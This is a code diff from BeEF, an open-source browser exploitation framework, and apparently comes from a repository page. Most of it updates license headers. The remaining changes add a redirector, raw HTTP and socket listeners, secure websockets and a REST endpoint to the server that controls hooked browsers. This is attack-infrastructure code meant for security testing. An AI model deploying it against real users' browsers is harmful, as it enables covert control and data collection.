@@ -65,11 +55,11 @@ module Models
      command.save
      # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
      # @note prints the event into the console
      if BeEF::Settings.console?
-        print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
      end
    end
--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
@@ -29,10 +19,43 @@ module Handlers
    # Starts the AssetHandler instance
    def initialize
      @allocations = {}
      @sockets = {}
      @http_server = BeEF::Core::Server.instance
      @root_dir = File.expand_path('../../../../', __FILE__)
    end
    # Binds a redirector to a mount point
    # @param [String] target The target for the redirector
    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
    # @return [String] URL Path of the redirector
    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
    def bind_redirect(target, path=nil)
      url = build_url(path,nil)
      @allocations[url] = {'target' => target}
      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
      @http_server.remap
      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
      url
    end
    # Binds raw HTTP to a mount point
    # @param [Integer] status HTTP status code to return
    # @param [String] headers HTTP headers as a JSON string to return
    # @param [String] body HTTP body to return
    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
    def bind_raw(status, header, body, path=nil, count=-1)
      url = build_url(path,nil)
      @allocations[url] = {}
      @http_server.mount(
        url,
        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
      )
      @http_server.remap
      print_info "Raw HTTP bound to url [" + url + "]"
      url
    end
    # Binds a file to a mount point
    # @param [String] file File path to asset
    # @param [String] path URL path to mount the asset to (can be nil for random path)
@@ -59,6 +82,60 @@ module Handlers
        print_info "Url [" + url + "] unmounted"
    end
    # use it like: bind_socket("irc","0.0.0.0",6667)
    def bind_socket(name, host, port)
      if @sockets[name] != nil
        print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
      else
        t = Thread.new {
          server = TCPServer.new(host,port)
          loop do
            Thread.start(server.accept) do |client|
              data = ""
              recv_length = 1024
              threshold = 1024 * 512
              while (tmp = client.recv(recv_length))
                data += tmp
                break if tmp.length < recv_length || tmp.length == recv_length
                # 512 KB max of incoming data
                break if data > threshold
              end
              if  data.size > threshold
                print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
              else
                @sockets[name] = {'thread' => t, 'data' => data}
                print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
                print_debug "Bind Socket [#{name}] received:\n#{data}"
              end
              client.close
            end
          end
        }
        print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
      end
    end
    def get_socket_data(name)
      data = nil
      if @sockets[name] != nil
        data = @sockets[name]['data']
      else
        print_error "Bind Socket [#{name}] does not exists."
      end
      data
    end
    def unbind_socket(name)
        t = @sockets[name]['thread']
        if t.alive?
          print_debug "Thread to be killed: #{t}"
          Thread.kill(t)
          print_info "Bind Socket [#{name}] killed."
        else
          print_info "Bind Socket [#{name}] ALREADY killed."
        end
    end
    # Builds a URL based on the path and extension, if neither are passed a random URL will be generated
    # @param [String] path URL Path defined by bind()
    # @param [String] extension Extension defined by bind()
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
--- a/core/main/network_stack/handlers/raw.rb
+++ b/core/main/network_stack/handlers/raw.rb
@@ -0,0 +1,33 @@
 #
 # Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module NetworkStack
      module Handlers
        class Raw
 	        def initialize(status, header={}, body)
 	        	@status  = status
 	                @header  = header
 	                @body    = body
 	        end
 	        def call(env)
 	            [@status, @header, @body]
 	        end
 	        private
 	        @request
 	        @response
 	    end
 	end
 end
 end
 end
--- a/core/main/network_stack/handlers/redirector.rb
+++ b/core/main/network_stack/handlers/redirector.rb
@@ -0,0 +1,42 @@
 #
 # Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module NetworkStack
      module Handlers
        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
        # @todo Add new options to specify what kind of redirect you want to achieve
        class Redirector
 	        @target = "" 	
 	        def initialize(target)
 	        	@target = target
 	        end
 	        def call(env)
 	        	@response = Rack::Response.new(
 	        		body = ['302 found'],
 	        		status = 302,
 	        		header = {
 	        			'Content-Type' => 'text',
 	        			'Location' => @target
 	        		}
 	        	)
 	        end
 	        private
 	        @request
 	        @response
 	    end
 	end
 end
 end
 end
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
@@ -27,17 +17,156 @@ module BeEF
        @@activeSocket= Hash.new
        @@lastalive= Hash.new
        @@config = BeEF::Core::Configuration.instance
        #@@wsopt=nil
        MOUNTS = BeEF::Core::Server.instance.mounts
        def initialize
-          port = @@config.get("beef.http.websocket.port")
+
          secure = @@config.get("beef.http.websocket.secure")
          @root_dir = File.expand_path('../../../../../', __FILE__)
          if (secure)
            ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
                     :tls_options => {
                         :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
                         :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
                     }
            }
            # @note Start a WSS server socket
            start_websocket_server(ws_secure_options, true)
          end
          # @note Start a WS server socket
          ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
          start_websocket_server(ws_options,false)
          #  #Thread for websocket-secure
          #  Thread.new {
          #    port = @@config.get("beef.http.websocket.secure_port")
          #    sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
          #    EventMachine.run {
          #
          #      wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
          #               :tls_options => {
          #                   :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
          #                   :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
          #               }
          #      }
          #
          #
          #      EventMachine::WebSocket.start(wsopt) do |ws|
          #        begin
          #          print_debug "New WebSocket-secured channel open."
          #          ws.onmessage { |msg|
          #            msg_hash = JSON.parse("#{msg}")
          #            #@note messageHash[result] is Base64 encoded
          #            if (msg_hash["cookie"]!= nil)
          #              print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
          #              #insert new connection in activesocket
          #              @@activeSocket["#{msg_hash["cookie"]}"] = ws
          #              print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
          #            elsif msg_hash["alive"] != nil
          #              hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
          #              unless hooked_browser.nil?
          #                hooked_browser.lastseen = Time.new.to_i
          #                hooked_browser.count!
          #                hooked_browser.save
          #
          #                #Check if new modules need to be sent
          #                zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
          #                zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
          #
          #                #@todo antisnatchor:
          #                #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
          #                #Check if new forged requests need to be sent (Requester/TunnelingProxy)
          #                dhook = BeEF::Extension::Requester::API::Hook.new
          #                dhook.requester_run(hooked_browser, '')
          #
          #                #Check if new XssRays scan need to be started
          #                xssrays = BeEF::Extension::Xssrays::API::Scan.new
          #                xssrays.start_scan(hooked_browser, '')
          #              end
          #            else
          #              #json recv is a cmd response decode and send all to
          #              #we have to call dynamicreconstructor handler camp must be websocket
          #              #print_debug("Received from WebSocket #{messageHash}")
          #              execute(msg_hash)
          #            end
          #          }
          #        rescue Exception => e
          #          print_error "WebSocket-secured error: #{e}"
          #        end
          #      end
          #    }
          #
          #  }
          #
          ##Thread for websocket
          #Thread.new {
          #  port = @@config.get("beef.http.websocket.port")
          #  sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
          #  EventMachine.run {
          #
          #    wsopt = {:host => "0.0.0.0", :port => port}
          #
          #
          #    EventMachine::WebSocket.start(wsopt) do |ws|
          #      begin
          #        print_debug "New WebSocket channel open."
          #        ws.onmessage { |msg|
          #          msg_hash = JSON.parse("#{msg}")
          #          #@note messageHash[result] is Base64 encoded
          #          if (msg_hash["cookie"]!= nil)
          #            print_debug("WebSocket - Browser says helo! WebSocket is running")
          #            #insert new connection in activesocket
          #            @@activeSocket["#{msg_hash["cookie"]}"] = ws
          #            print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
          #          elsif msg_hash["alive"] != nil
          #            hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
          #            unless hooked_browser.nil?
          #              hooked_browser.lastseen = Time.new.to_i
          #              hooked_browser.count!
          #              hooked_browser.save
          #
          #              #Check if new modules need to be sent
          #              zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
          #              zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
          #
          #              #@todo antisnatchor:
          #              #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
          #              #Check if new forged requests need to be sent (Requester/TunnelingProxy)
          #              dhook = BeEF::Extension::Requester::API::Hook.new
          #              dhook.requester_run(hooked_browser, '')
          #
          #              #Check if new XssRays scan need to be started
          #              xssrays = BeEF::Extension::Xssrays::API::Scan.new
          #              xssrays.start_scan(hooked_browser, '')
          #            end
          #          else
          #            #json recv is a cmd response decode and send all to
          #            #we have to call dynamicreconstructor handler camp must be websocket
          #            #print_debug("Received from WebSocket #{messageHash}")
          #            execute(msg_hash)
          #          end
          #        }
          #      rescue Exception => e
          #        print_error "WebSocket error: #{e}"
          #      end
          #    end
          #  }
          #}
        end
        def start_websocket_server(ws_options, secure)
          Thread.new {
            sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
-            EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
+            EventMachine.run {
-              EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
+              EventMachine::WebSocket.start(ws_options) do |ws|
                begin
-                  print_debug "New WebSocket channel open."
+                  secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
                  ws.onmessage { |msg|
                    msg_hash = JSON.parse("#{msg}")
                    #@note messageHash[result] is Base64 encoded
@@ -80,7 +209,6 @@ module BeEF
              end
            }
          }
        end
        #@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +243,7 @@ module BeEF
          handler = data["handler"]
          if handler.match(/command/)
            BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
-                 @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
+                                                    @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
          else #processing results from extensions, call the right handler
            data["beefhook"] = hooked_browser
            data["results"] = JSON.parse(Base64.decode64(data["result"]))
--- a/core/main/rest/api.rb
+++ b/core/main/rest/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
@@ -29,6 +19,12 @@ module BeEF
        end
      end
      module RegisterCategoriesHandler
        def self.mount_handler(server)
          server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
        end
      end
      module RegisterLogsHandler
        def self.mount_handler(server)
          server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
@@ -43,6 +39,8 @@ module BeEF
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
--- a/core/main/rest/handlers/admin.rb
+++ b/core/main/rest/handlers/admin.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/rest/handlers/categories.rb
+++ b/core/main/rest/handlers/categories.rb
@@ -0,0 +1,39 @@
 #
 # Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module Rest
      class Categories < BeEF::Core::Router::Router
        config = BeEF::Core::Configuration.instance
        before do
          error 401 unless params[:token] == config.get('beef.api_token')
          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
          headers 'Content-Type' => 'application/json; charset=UTF-8',
                  'Pragma' => 'no-cache',
                  'Cache-Control' => 'no-cache',
                  'Expires' => '0'
        end
        get '/' do
           categories = BeEF::Modules::get_categories
           cats = Array.new
           i = 0
           # todo add sub-categories support!
           categories.each do |category|
             cat = {"id" => i, "name" => category}
             cats << cat
             i += 1
           end
           cats.to_json
        end
      end
    end
  end
 end
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
@@ -30,12 +20,16 @@ module BeEF
                  'Expires' => '0'
        end
        #
        # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
        #
        #get "/to/a/pub"
        #  "BeER please"
        #end
        #
        # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
        #
        get '/' do
          online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
          offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
@@ -49,7 +43,9 @@ module BeEF
          output.to_json
        end
        #
        # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
        #
        get '/:session' do
          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
          error 401 unless hb != nil
@@ -76,14 +72,15 @@ module BeEF
           details = BeEF::Core::Models::BrowserDetails
           {
-               'name' => details.get(hb.session, 'BrowserName'),
+               'id'       => hb.id,
-               'version' => details.get(hb.session, 'BrowserVersion'),
+               'session'  => hb.session,
-               'os' => details.get(hb.session, 'OsName'),
+               'name'     => details.get(hb.session, 'BrowserName'),
-               'platform' => details.get(hb.session, 'SystemPlatform'),
+               'version'  => details.get(hb.session, 'BrowserVersion'),
-               'session' => hb.session,
+               'os'       => details.get(hb.session, 'OsName'),
-               'ip' => hb.ip,
+               'platform' => details.get(hb.session, 'BrowserPlatform'),
-               'domain' => details.get(hb.session, 'HostName'),
+               'ip'       => hb.ip,
-               'port' => hb.port.to_s,
+               'domain'   => details.get(hb.session, 'HostName'),
               'port'     => hb.port.to_s,
               'page_uri' => details.get(hb.session, 'PageURI')
           }
        end
@@ -91,4 +88,4 @@ module BeEF
      end
    end
  end
-end
+end
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
@@ -30,13 +20,17 @@ module BeEF
                  'Expires' => '0'
        end
        #
        # @note Get all global logs
        #
        get '/' do
          logs = BeEF::Core::Models::Log.all()
          logs_to_json(logs)
        end
        #
        # @note Get hooked browser logs
        #
        get '/:session' do
          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
          error 401 unless hb != nil
--- a/Show More
+++ b/Show More
		`@@ -0,0 +1,2 @@`
							`# Reference for old (<1.2) versions of BeEF Live`
							`bash /opt/beef/liveCD/BeEFLive.sh`